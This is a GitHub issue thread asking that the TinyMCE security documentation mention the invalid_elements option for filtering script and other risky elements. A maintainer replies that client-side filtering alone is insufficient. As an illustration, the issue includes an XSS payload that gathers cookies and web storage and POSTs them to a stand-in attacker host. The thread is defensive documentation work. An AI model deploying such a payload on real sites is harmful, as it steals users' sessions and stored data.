### ISSUE TITLE
Page /advanced/security/.md does not mention invalid_elements

### ISSUE THREAD

**Issue by vanillajonathan** [tinymce/tinymce-docs#1082]
The [/tinymce-docs/advanced/security.md](https://github.com/tinymce-docs/advanced/security.md) page does not mention the [`invalid_elements`](https://www.tiny.cloud/docs/configure/content-filtering/#invalid_elements) option which can be used to filter out unwanted `<script>` elements.

Other elements someone may wish to filter out include the [`<object>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/object), [`<applet>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/applet) (obsolete), [`<embed>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/embed), and [`<iframe>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) elements. 

### TinyMCE initialization code
```js
tinymce.init({
  selector: 'textarea',
  invalid_elements : 'script'
});
```

### User-submitted editor content
```html
<h1>Hello world!</h1>
<p>Oh, the things you don't know...</p>

<script>
let data_collection = {
  'cookie': document.cookie,
  'localStorage': window.localStorage,
  'sessionStorage': window.sessionStorage
};

fetch('https://evil.example.com/collector.php', {
    method: 'POST',
    mode: 'cors',
    credentials: 'include',
    body: JSON.stringify(data_collection)
});
</script>
```

**Comment by Afraithe** [comment]
Relying on client side filtering isn't enough, as the security page states. No point going through every possible attack vector.
